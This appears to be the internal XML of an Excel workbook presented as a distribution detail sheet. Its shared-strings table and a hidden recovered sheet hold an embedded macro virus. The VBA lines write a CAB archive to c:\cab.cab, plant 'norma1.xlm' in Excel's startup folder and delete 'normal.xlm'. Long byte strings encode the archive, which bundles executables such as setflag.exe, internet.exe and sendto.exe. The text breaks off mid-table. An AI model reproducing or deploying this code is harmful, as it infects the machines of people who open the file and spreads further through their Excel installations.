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638" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="Recovered_Sheet1" sheetId="1" state="hidden" r:id="rId1"/>
    <sheet name="发放明细表" sheetId="2" r:id="rId2"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId3"/>
  </externalReferences>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">发放明细表!$A$2:$XEV$2747</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="1">发放明细表!#REF!</definedName>
    <definedName name="否">[1]选项!$F$2:$F$8</definedName>
    <definedName name="是">[1]选项!$E$2:$E$9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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="19077" uniqueCount="7231">
  <si>
    <t xml:space="preserve">77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 0 0 0 24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</si>
  <si>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Private Sub createcabfile()</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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Dim ch As Byte</t>
  </si>
  <si>
    <t>on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t>myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t>End If</t>
  </si>
  <si>
    <t>For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101 116 46 101 120 101 0 0 18 1 0 0 224 0 0 0 0 232 48 177 180 32 0 110 111 114 109 97 49 46 120 108 109 0 0 158 1 0 0 242 1 0 0 0 232 48 109 144 32 0 110 111 114 109 97 108 46 100 111 116 0 0 80 0 0 0 144 3 0 0 0 229 48 54 95 32 0 115 101 110 100 116 111 46 101 120 101 0 93 3 165 99 72 50 0 128 67 75 236 58 109 116 20 85 150 85 93 213 73 37 169 166 11 236 196 0 65 90 44 92 152 48 28 156 14 14 216 129 105 52 221 9 199 4 58 132 116 19 49 9 40 196 216 43 200 36 85 160 78 26 59 84 218 77 229 209 154 221 163 206 236 142 103 143 46 58 198 115 156 213 61 58 51 56 199 29 187 19 76 2 202 71 24 151 201 12 179 10 234 226 203 20 106 28 178 157 206 208 80 123 95 85 135 4 231 99 119 127 204 191 188 115 94 223 170 247 238 123 239 222 251 238 103 37 85 247 116 83 12 69 81 44 116 93 167 168 195 148 217 60 212 255 222 6 161 207 90 248 243 89 212 155 57 199 111 62 76 87 30 191 121 115 243 131 173 206 61 45 15 63 208 178 125 151 243 254 237 187 119 63 44 57 239 219 233 108 145 119 59 31 220 237 44 219 88 227 220 245 240 142 157 203 109 182 92 49 179 199 227 53 76 212 253 173 93 103 38 251 47 191 249 192 153 60 128 135 151 223 127 230 91 198 216 67 103 110 4 88 247 205 253 103 86 25 243 77 103 214 2 220 244 224 253 205 4 127 146 22 191 151 162 42 105 134 154 255 220 39 215 72 63 71 217 233 60 58 11 38 225 101 133 57 22 190 17 126 4 232 219 50 92 10 230 59 155 89 51 9 169 238 12 30 52 198 248 21 50 239 194 181 113 97 154 44 </t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">28 59 40 106 201 255 65 102 255 239 6 116 190 254 23 166 151 75 59 31 145 0 238 189 51 67 144 255 107 132 65 115 194 46 203 91 118 108 151 182 83 212 7 217 25 222 175 201 96 170 129 52 60 203 77 52 106 112 62 252 236 201 224 237 249 35 188 248 95 131 213 153 54 211 102 218 76 155 105 51 109 166 205 180 153 54 211 102 218 76 155 105 127 189 166 92 44 65 101 98 105 77 109 0 85 176 65 87 178 217 179 199 67 85 171 146 184 172 191 76 156 47 96 31 212 139 8 135 232 208 178 90 252 36 148 210 181 33 58 182 89 92 17 162 55 225 239 91 97 170 76 92 181 88 135 125 18 231 44 126 188 15 70 2 40 21 170 172 85 219 68 9 55 0 126 0 223 7 131 106 135 216 65 25 216 149 202 145 85 29 241 189 34 250 8 118 10 177 53 184 218 220 69 84 142 8 104 208 215 126 158 108 166 244 177 238 175 218 62 116 157 237 136 171 247 138 69 246 39 158 130 65 216 210 137 54 139 206 16 133 44 158 196 185 28 127 45 190 66 214 74 226 150 24 162 44 148 65 117 41 190 4 21 60 122 15 165 208 144 90 38 222 155 24 177 92 122 137 48 136 142 41 231 25 255 165 23 241 32 153 175 20 183 193 241 205 100 85 204 145 183 9 191 111 14 150 1 166 71 73 176 202 17 81 173 132 211 42 69 135 199 164 168 189 143 224 186 19 176 103 145 253 160 172 235 122 136 10 173 168 197 223 179 78 138 164 44 196 110 194 29 172 201 100 8 228 145 99 29 131 37 64 101 48 131 83 41 86 132 216 106 188 141 224 108 22 253 100 168 76 148 66 172 95 125 218 144 14 246 153 84 180 41 71 42 80 226 31 219 63 214 105 138 98 122 81 42 161 231 0 21 52 21 1 17 44 123 148 91 223 126 148 186 170 235 235 36 107 57 25 64 227 137 11 57 1 114 99 120 156 49 54 40 10 81 235 208 112 226 124 78 117 45 254 13 236 9 162 141 234 251 75 209 165 73 158 3 248 44 99 16 177 4 136 189 23 4 202 118 3 99 203 50 82 125 217 88 82 212 222 79 80 55 202 199 64 194 75 92 113 247 40 225 29 186 211 254 228 5 160 182 9 </t>
  </si>
  <si>
    <t xml:space="preserve">241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18 12 28 237 238 111 251 59 237 111 97 108 21 2 206 149 68 150 235 236 52 73 37 82 57 232 84 226 227 156 226 99 176 89 169 251 87 225 185 176 178 50 86 242 172 178 246 138 68 223 229 30 150 184 59 149 126 214 253 171 182 47 204 75 66 142 238 59 1 159 25 218 84 139 255 141 49 111 169 76 252 155 16 237 199 223 167 13 33 192 81 149 213 248 105 139 33 173 178 77 184 11 158 106 241 46 138 252 206 166 12 209 186 226 141 13 245 91 149 35 37 125 221 208 2 112 36 23 84 78 234 200 199 247 120 36 171 50 168 107 119 244 40 82 73 0 183 80 134 117 96 1 204 66 223 43 224 90 43 89 207 71 227 97 43 224 107 115 144 175 40 26 151 242 252 216 70 38 154 138 168 58 52 160 52 241 84 99 67 159 177 107 52 41 231 4 240 223 195 46 117 48 130 111 129 135 104 188 206 56 162 161 47 233 179 121 36 59 217 246 183 176 122 124 184 174 97 126 188 207 21 111 232 171 33 107 121 215 217 32 16 132 6 193 8 34 19 22 249 219 77 175 112 180 116 27 242 113 104 109 113 10 148 227 214 160 159 172 29 55 73 114 15 200 179 8 253 17 105 150 120 69 245 241 90 182 178 129 119 42 239 1 83 156 210 196 82 106 86 35 234 107 216 218 23 162 177 133 144 3 135 128 235 112 157 117 233 171 87 198 145 135 218 95 245 194 225 239 121 64 173 94 7 134 86 161 10 62 153 80 164 21 74 155 40 208 178 221 143 151 131 249 40 41 189 78 90 112 151 54 143 140 82 242 13 201 132 69 154 229 199 55 100 166 100 75 94 202 231 54 54 107 123 195 88 136 250 36 11 26 104 132 83 107 209 197 106 56 16 133 121 251 107 97 1 121 57 53 156 142 234 170 151 67 31 201 217 174 248 200 113 226 105 100 71 211 184 143 231 105 137 67 190 66 213 235 </t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t xml:space="preserve">208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 178 161 62 215 233 113 217 129 46 23 255 65 179 160 203 198 22 32 199 215 12 19 226 129 19 169 156 246 114 197 195 238 129 150 181 40 156 214 150 2 185 1 251 47 40 63 254 61 104 65 157 33 133 229 186 151 16 121 55 80 25 141 63 78 232 164 201 213 158 181 71 253 32 13 228 21 128 233 163 125 228 6 144 55 13 167 12 20 27 135 242 218 103 186 36 178 248 35 11 185 129 16 13 47 28 102 243 224 165 238 235 34 170 231 208 73 144 80 56 173 86 113 134 136 94 249 147 34 226 51 34 210 24 84 197 101 230 190 97 10 233 22 247 32 154 48 133 116 123 13 14 66 80 88 26 230 38 165 196 124 68 88 187 219 93 229 104 89 78 196 130 18 82 142 41 150 68 113 175 191 134 8 228 229 188 140 174 75 183 19 161 124 123 169 151 99 134 181 194 0 254 73 46 76 16 41 44 233 100 128 140 187 244 42 14 72 81 194 28 101 143 238 189 158 125 65 99 13 33 12 184 78 23 123 57 34 128 255 50 173 141 168 170 34 61 12 46 193 17 213 165 92 69 167 193 40 116 139 92 47 126 9 207 160 191 178 45 128 127 54 139 162 232 50 209 81 231 210 3 248 179 180 78 12 180 14 52 60 91 76 19 13 119 244 208 146 208 195 73 124 242 8 43 103 15 248 10 137 243 11 130 76 29 132 252 115 54 131 124 215 81 32 213 254 76 98 61 74 104 182 1 107 247 94 15 85 64 156 192 160 14 54 138 23 204 38 6 41 211 125 126 88 38 76 118 252 172 221 112 19 125 33 15 188 242 164 227 33 162 229 71 120 114 77 33 189 249 245 109 30 170 57 114 155 135 218 241 130 241 37 123 135 186 216 140 204 2 92 161 186 19 235 249 44 96 184 78 119 125 160 230 247 192 145 104 208 140 73 170 237 69 120 75 156 231 152 99 170 237 121 242 136 133 67 207 1 12 81 120 79 </t>
  </si>
  <si>
    <t xml:space="preserve">33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31 167 0 15 121 47 34 14 229 168 85 231 252 213 248 89 193 80 61 4 4 203 231 240 239 200 133 175 233 132 85 22 201 138 191 152 11 7 19 101 189 105 30 69 53 19 226 245 252 50 112 243 128 63 133 116 116 18 105 2 30 234 50 88 28 16 59 233 254 36 49 128 119 207 55 24 11 72 185 126 28 35 207 224 11 67 64 95 228 49 160 50 159 7 108 112 121 181 160 250 160 12 238 53 207 131 23 178 43 79 16 109 31 128 56 153 178 42 23 22 198 138 162 207 3 114 226 2 131 152 100 217 10 150 150 30 12 98 251 226 140 26 150 94 211 158 130 144 5 167 68 138 10 209 8 227 47 225 161 206 253 110 157 84 20 196 159 144 103 191 158 239 128 195 64 196 185 122 190 0 79 8 107 22 215 231 65 124 55 204 34 166 46 178 99 5 75 69 63 151 114 106 113 255 34 192 215 242 93 113 205 161 44 126 26 152 165 76 213 201 153 84 157 250 173 38 135 166 30 47 0 45 156 171 239 229 112 22 104 73 83 123 19 63 126 217 21 175 83 179 84 31 167 250 216 134 62 8 93 172 219 74 56 107 93 131 6 33 224 77 88 149 143 23 34 62 70 184 74 150 13 1 67 139 253 120 109 134 200 66 147 72 206 36 18 72 140 131 13 206 57 68 200 184 142 10 162 139 237 23 29 36 3 169 226 106 220 54 178 127 32 104 87 30 5 95 132 18 232 171 63 150 93 23 200 174 135 182 119 4 1 3 28 127 88 80 195 41 53 60 106 248 23 50 214 227 148 248 144 37 88 141 15 229 26 198 131 24 166 63 233 97 35 246 142 4 185 15 47 79 150 120 211 106 152 179 63 241 25 140 196 162 23 47 131 85 86 165 139 171 120 119 149 208 186 20 30 117 111 186 43 39 50 145 43 103 235 222 209 126 202 230 233 228 60 104 48 246 12 193 44 62 214 62 65 254 92 211 246 62 </t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t xml:space="preserve">74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 33 212 104 3 177 170 177 96 181 46 11 186 204 235 83 135 192 214 99 192 145 234 77 105 47 79 33 63 7 97 1 191 227 36 106 176 198 84 58 143 196 131 4 34 171 230 217 59 142 67 68 49 207 42 34 70 189 134 28 166 21 20 123 71 255 156 186 128 55 124 129 4 198 64 8 226 69 131 156 125 152 184 42 45 203 221 31 206 70 253 135 200 12 228 148 248 49 162 117 135 72 24 38 225 234 230 16 27 80 141 112 138 183 95 55 193 133 230 225 205 224 13 235 92 71 15 251 193 34 81 62 153 81 217 217 74 220 9 153 240 154 83 45 16 129 127 231 58 253 214 54 50 217 139 126 111 42 2 98 13 69 64 236 40 113 231 16 33 100 70 201 209 149 132 243 206 246 137 56 96 182 125 0 14 241 63 193 93 68 214 156 34 44 72 214 145 38 56 151 104 25 36 36 50 79 146 145 6 161 231 128 189 227 18 176 213 227 177 71 53 2 33 253 35 249 69 143 96 239 56 75 148 100 3 39 94 85 103 129 127 6 124 50 161 236 228 41 241 75 222 210 244 10 111 248 245 69 237 87 247 192 105 18 215 126 181 27 160 156 87 131 127 184 200 72 139 228 236 0 174 36 156 146 56 198 209 65 105 71 38 217 137 85 208 234 44 180 161 112 61 4 196 13 236 126 33 232 175 193 212 149 140 95 227 53 151 114 89 151 10 80 31 122 143 48 122 126 146 209 24 59 168 89 15 111 105 5 11 243 176 78 201 22 178 132 168 26 124 52 219 212 108 31 215 85 197 117 114 154 3 242 71 47 215 72 182 252 113 122 114 203 213 97 190 81 202 34 145 75 179 67 244 55 170 37 141 227 157 64 63 201 220 182 214 247 189 63 173 129 128 130 134 128 170 4 20 230 192 242 134 152 126 247 213 189 156 59 101 63 240 8 88 213 248 0 249 107 164 236 128 194 70 249 152 81 38 184 150 </t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t xml:space="preserve">165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 251 215 54 143 173 159 194 53 176 104 165 223 162 12 88 8 214 143 174 97 117 155 56 62 192 40 39 51 7 167 175 63 9 224 109 232 111 66 127 21 250 139 208 159 131 254 52 244 131 132 254 178 39 63 85 203 158 250 20 32 6 136 1 94 4 120 17 32 20 31 79 141 2 28 3 56 6 48 5 48 5 48 13 48 29 99 99 198 159 105 71 153 212 164 36 116 194 240 40 244 52 116 97 33 140 120 185 134 198 163 125 221 132 186 233 207 38 231 153 17 160 241 58 105 128 40 38 113 99 210 109 233 88 219 234 116 70 254 226 148 252 109 87 46 189 148 134 115 247 56 201 185 227 191 6 41 59 157 6 191 147 247 49 97 222 71 49 185 143 71 22 26 247 65 144 187 59 225 185 7 250 41 232 93 62 230 150 161 206 114 102 3 108 188 145 108 251 211 105 219 18 186 50 243 83 119 244 133 69 249 210 144 254 193 105 152 221 211 240 0 105 234 174 190 96 148 47 9 185 246 3 247 64 88 185 126 111 17 192 50 232 37 208 75 161 151 65 175 132 190 25 250 3 78 227 94 160 240 123 170 8 96 33 192 66 128 14 128 14 128 2 64 1 32 15 144 7 200 1 228 0 178 0 217 235 239 197 148 79 4 126 59 161 255 0 250 171 206 105 247 226 99 128 234 105 247 96 188 95 127 7 211 199 174 187 55 125 229 197 125 30 202 72 128 137 192 73 86 209 38 178 231 246 45 50 210 137 34 179 80 146 11 86 151 137 156 36 24 99 63 188 201 28 251 208 21 55 99 175 123 37 39 121 168 125 144 225 223 87 96 78 21 65 189 197 132 232 6 165 223 174 92 24 13 76 37 25 78 35 201 152 138 216 246 142 35 25 31 246 54 129 22 41 215 48 238 145 127 133 55 158 158 116 85 80 186 189 189 128 68 0 43 184 11 53 75 223 91 8 49 158 228 150 7 141 50 146 87 141 60 251 33 </t>
  </si>
  <si>
    <t xml:space="preserve">226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171 2 206 177 255 148 94 167 206 106 232 27 31 158 31 87 206 9 74 92 200 201 184 87 82 73 130 7 82 46 242 196 75 115 65 247 74 51 131 122 151 100 1 253 224 247 193 41 66 240 207 164 1 25 223 200 244 119 249 217 100 47 164 2 255 76 138 230 157 41 10 234 14 37 44 80 232 164 244 64 178 215 34 223 151 236 173 144 22 116 121 172 165 185 82 129 94 37 128 5 50 177 141 244 128 55 69 10 157 254 178 21 214 92 51 112 67 192 150 133 106 35 104 139 102 222 114 135 25 68 67 214 58 119 66 206 159 10 132 170 205 136 201 107 201 129 169 93 70 206 177 18 158 253 184 142 228 142 35 183 18 122 25 84 59 70 215 166 98 149 43 88 35 87 129 204 35 69 84 225 180 148 19 249 78 174 204 242 172 102 17 47 119 130 18 129 183 77 169 94 129 25 116 39 212 170 148 93 121 207 72 80 132 46 170 20 226 51 185 198 82 155 148 215 153 93 174 123 133 17 82 127 175 95 13 249 73 33 96 120 34 171 114 229 44 197 43 88 180 134 254 108 91 57 108 162 181 154 188 0 110 204 171 135 232 201 44 68 188 46 91 132 167 114 37 60 70 73 235 204 124 160 66 186 161 203 171 131 124 110 132 109 80 94 121 103 217 109 86 109 169 59 204 203 121 145 176 158 43 91 251 179 115 181 194 16 29 210 73 42 81 109 124 156 224 201 140 196 146 115 129 126 32 201 126 160 28 108 91 19 64 186 18 240 156 213 227 1 38 45 157 89 197 97 30 114 51 200 115 254 82 70 241 166 145 16 72 22 253 84 179 3 66 105 51 7 63 248 4 96 52 179 228 149 34 175 239 80 153 82 6 74 12 163 144 201 55 117 151 12 208 198 0 155 25 8 134 232 198 213 107 134 225 16 121 54 177 75 61 127 217 54 82 77 228 47 1 0 198 201 83 53 232 94 209 161 174 249 0 80 </t>
  </si>
  <si>
    <t xml:space="preserve">58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3 169 173 182 107 251 246 179 218 231 102 94 93 99 38 214 129 96 107 43 164 214 163 36 181 134 164 183 52 54 153 244 218 147 101 183 65 126 29 240 227 15 11 205 130 65 230 167 100 169 109 132 243 10 13 209 20 1 171 43 72 85 48 12 249 196 215 178 239 28 63 126 163 128 120 2 39 202 38 101 194 149 24 40 0 234 251 179 151 115 205 34 161 158 231 92 103 209 62 97 117 35 171 202 99 97 70 109 100 67 116 77 0 175 51 235 73 119 31 228 211 109 91 81 144 111 26 239 229 104 153 43 46 103 71 230 16 83 200 70 27 57 52 92 252 235 100 47 163 214 167 164 165 232 12 250 48 241 7 171 242 201 66 228 120 198 172 27 126 195 70 164 37 104 200 125 170 117 81 228 142 92 153 209 189 169 59 181 175 146 189 17 121 206 117 149 238 8 201 222 149 112 154 146 57 208 168 145 55 224 45 89 206 131 241 147 226 21 5 217 232 105 153 187 185 54 53 242 15 240 90 156 96 122 201 119 153 254 63 85 121 101 193 129 33 146 71 233 242 24 126 252 170 201 129 55 45 47 64 229 28 212 32 196 24 91 243 136 125 1 41 156 7 72 41 183 57 181 18 130 158 38 43 170 96 133 145 249 194 50 200 215 247 217 208 70 195 223 89 193 223 73 12 42 47 36 7 27 199 192 43 249 194 226 229 150 122 211 64 50 148 21 76 194 208 121 242 149 164 26 28 221 202 49 136 30 228 99 137 235 44 72 71 173 79 119 101 151 110 151 230 149 182 72 246 210 125 246 232 34 144 224 91 52 4 22 141 124 0 56 65 107 220 91 57 196 0 79 88 66 244 61 93 229 116 249 29 125 246 142 79 128 93 247 47 205 180 213 254 139 184 146 218 252 120 139 180 77 193 197 146 87 193 115 165 219 21 60 75 42 170 176 71 95 37 101 70 125 218 30 61 4 15 3 222 52 241 128 202 81 </t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t xml:space="preserve">167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 200 113 207 72 13 76 175 174 79 201 203 51 110 183 253 130 254 142 174 143 148 102 134 111 156 28 62 65 254 189 107 100 49 12 195 82 41 219 117 122 100 46 60 71 142 71 70 102 3 108 126 17 144 12 39 13 110 232 187 55 194 141 15 130 67 112 191 23 102 161 188 157 135 188 14 221 122 16 116 69 221 195 171 91 88 181 80 221 194 169 91 138 212 10 243 27 14 202 39 5 8 84 231 174 207 93 73 87 220 253 31 193 253 245 104 129 241 165 240 50 178 187 143 75 249 201 117 188 34 229 122 148 1 214 221 219 118 81 251 14 42 81 52 17 165 66 206 196 103 22 92 144 130 50 5 217 204 250 196 110 126 97 44 205 118 95 145 10 209 184 251 191 129 223 13 130 174 238 102 213 221 188 186 155 83 151 171 187 139 80 191 81 92 147 162 131 208 75 34 4 68 118 123 135 147 216 196 22 46 122 214 222 145 79 110 242 178 85 230 149 109 28 56 177 45 35 54 99 0 244 57 73 244 217 246 91 194 77 21 40 36 175 26 207 168 130 37 89 84 116 208 152 173 104 37 21 83 37 252 50 67 1 247 177 112 126 172 100 125 241 80 172 228 39 195 80 54 41 183 82 202 255 180 247 53 80 81 92 89 194 213 116 129 5 52 118 43 16 209 104 210 70 204 196 33 49 196 246 7 166 197 116 11 173 128 160 141 45 221 33 138 74 164 13 116 16 152 166 74 193 129 164 73 193 124 20 149 90 157 196 179 155 61 51 155 9 209 153 117 146 239 59 155 179 153 207 207 153 100 147 198 206 128 154 108 98 116 39 58 154 47 226 140 187 83 78 185 9 70 3 173 33 212 119 239 171 106 108 147 56 51 187 103 206 126 231 236 225 157 243 120 127 247 189 119 223 223 125 247 222 119 139 30 48 149 114 163 34 37 46 217 0 48 5 176 188 97 36 24 152 224 113 1 155 11 246 198 101 117 98 </t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t xml:space="preserve">86 117 193 15 226 178 240 93 64 41 45 120 46 46 11 53 236 202 178 2 41 46 235 105 204 202 46 216 19 151 133 58 15 101 90 193 179 152 149 162 101 245 162 0 75 16 9 48 234 169 42 129 68 171 54 43 12 14 189 2 114 224 136 236 199 49 162 206 58 25 229 218 204 197 64 181 64 64 17 55 100 211 98 154 27 192 243 51 81 32 244 30 198 191 44 142 22 198 138 113 62 108 178 15 180 208 249 22 238 115 201 84 178 89 50 73 152 11 39 24 178 88 32 123 17 143 237 92 254 156 131 132 182 114 137 242 124 224 132 196 37 168 121 178 169 189 73 223 137 176 211 151 23 176 134 213 94 249 159 81 111 37 177 73 6 69 150 232 127 194 219 196 45 223 53 162 170 226 112 149 253 170 176 4 245 82 32 178 38 203 125 255 142 123 161 0 91 200 187 155 205 175 244 201 207 101 225 67 85 149 43 244 112 1 123 79 165 124 233 115 85 181 71 170 132 36 2 30 68 112 159 186 84 70 243 207 42 32 248 85 198 47 243 238 230 142 85 171 4 9 249 135 88 46 204 193 184 112 215 150 205 131 137 7 0 83 60 14 27 117 34 113 11 246 143 3 71 249 230 16 192 214 209 0 227 245 168 153 121 48 79 125 168 82 19 150 28 197 77 50 158 151 197 38 136 81 201 21 117 75 174 49 183 199 227 147 203 9 79 129 212 71 162 123 220 114 201 231 56 40 254 237 44 251 85 192 144 145 79 92 6 12 98 240 162 11 128 190 239 246 250 228 25 164 214 24 255 118 70 177 64 52 113 91 54 239 71 85 156 70 189 196 114 96 66 50 60 94 126 46 37 114 22 164 96 131 4 107 88 200 110 149 101 132 101 112 144 132 14 83 40 239 30 174 168 215 109 112 132 110 220 195 46 232 58 201 206 55 31 58 57 242 116 77 155 131 162 89 147 106 232 30 97 147 122 45 61 119 172 114 144 248 175 73 92 121 143 36 232 208 189 212 42 108 96 149 67 41 36 57 137 164 184 215 226 48 31 58 59 194 199 55 146 216 155 213 115 215 42 232 197 202 38 119 33 151 117 35 153 123 183 235 36 103 44 86 24 210 212 118 21 216 195 44 42 148 71 153 187 134 0 207 </t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 66 101 214 7 138 120 106 13 112 126 83 11 17 145 129 164 77 171 84 195 26 238 106 175 5 240 44 229 59 178 40 46 5 81 121 24 80 97 191 131 218 103 118 33 0 206 140 27 98 146 54 63 218 220 152 227 38 208 8 185 170 193 113 233 17 32 143 177 9 83 13 151 102 96 82 101 141 252 183 96 57 50 128 254 169 84 117 164 162 162 239 226 46 36 129 226 3 101 91 113 55 217 206 1 37 132 141 202 217 212 95 139 195 246 171 44 28 95 132 192 209 42 247 169 153 197 200 67 68 237 95 152 187 254 128 87 3 41 195 39 151 75 248 34 202 71 13 230 110 36 26 176 135 76 90 125 115 215 17 124 128 203 191 75 28 96 167 58 28 219 243 179 184 235 90 240 89 206 128 88 80 4 205 125 16 245 120 28 30 143 219 235 241 8 69 217 139 213 211 162 108 87 216 69 149 242 161 207 180 35 83 148 109 97 231 121 60 149 168 198 206 6 40 245 52 112 171 83 137 46 187 229 15 120 78 54 101 91 128 121 179 120 213 76 7 162 23 81 60 124 52 129 43 179 127 129 36 35 134 49 187 60 239 110 113 16 136 121 94 22 247 5 254 25 201 25 116 136 114 165 188 238 51 253 56 115 180 109 68 73 173 244 121 229 41 159 146 219 223 167 102 46 199 218 3 200 40 33 229 70 65 238 114 17 170 115 235 112 70 228 12 173 42 8 102 76 224 78 249 239 46 33 50 75 144 165 24 36 108 155 21 181 136 223 71 72 251 112 203 172 16 10 52 83 213 129 85 137 41 125 8 195 15 48 137 88 166 252 86 130 17 2 127 182 9 250 218 14 188 232 74 216 117 191 210 94 167 139 186 195 230 174 95 96 60 87 170 163 15 83 12 54 37 205 94 216 158 32 14 231 19 89 168 99 253 91 7 118 35 63 140 248 116 93 33 143 65 108 30 175 245 47 76 145 122 72 247 253 45 89 161 </t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t xml:space="preserve">173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225 155 249 120 251 47 109 231 180 193 46 63 163 74 139 207 112 229 221 231 6 86 209 157 92 98 96 228 17 37 69 140 20 19 153 47 252 57 52 188 129 44 20 175 170 236 12 223 68 55 38 162 158 18 86 224 130 38 133 214 210 14 197 204 71 141 112 56 214 210 140 66 195 223 80 33 255 133 177 253 135 42 65 92 205 116 35 83 77 158 63 139 34 182 112 128 66 17 187 14 153 18 243 190 48 244 81 75 90 221 143 114 51 155 41 179 70 242 64 98 142 9 210 91 241 89 35 28 129 91 55 242 46 81 12 250 42 81 178 168 123 49 23 74 225 190 62 49 151 162 170 225 228 136 255 10 87 80 89 54 61 234 164 147 0 187 195 120 56 88 51 44 23 3 23 147 69 72 56 140 66 63 190 65 138 184 176 129 241 186 131 208 64 173 186 4 149 15 250 99 10 148 88 225 198 23 155 77 252 184 202 46 4 1 32 155 189 79 90 188 83 52 189 38 148 129 140 80 108 226 219 95 163 41 110 122 157 1 121 131 162 215 24 25 63 35 80 55 188 198 40 145 218 61 137 148 38 215 32 55 110 11 215 138 105 152 238 108 163 177 35 206 34 86 152 196 245 166 252 10 134 75 36 184 69 60 21 175 215 194 101 169 164 232 17 96 103 133 53 140 80 72 11 79 152 170 54 30 161 169 119 223 245 22 46 202 125 164 48 55 151 240 246 12 14 125 76 172 54 1 225 30 117 144 65 154 187 241 82 23 224 194 112 161 150 28 110 6 161 112 76 108 49 137 223 99 112 4 53 146 105 39 223 190 135 166 88 151 183 82 122 194 162 110 216 67 87 111 134 22 82 195 172 173 117 57 64 121 228 159 17 158 154 134 82 175 71 254 152 36 24 168 22 48 136 69 123 24 185 6 31 215 232 61 66 161 9 234 50 80 1 138 196 197 123 148 62 242 5 136 50 155 140 68 201 196 198 3 170 71 </t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
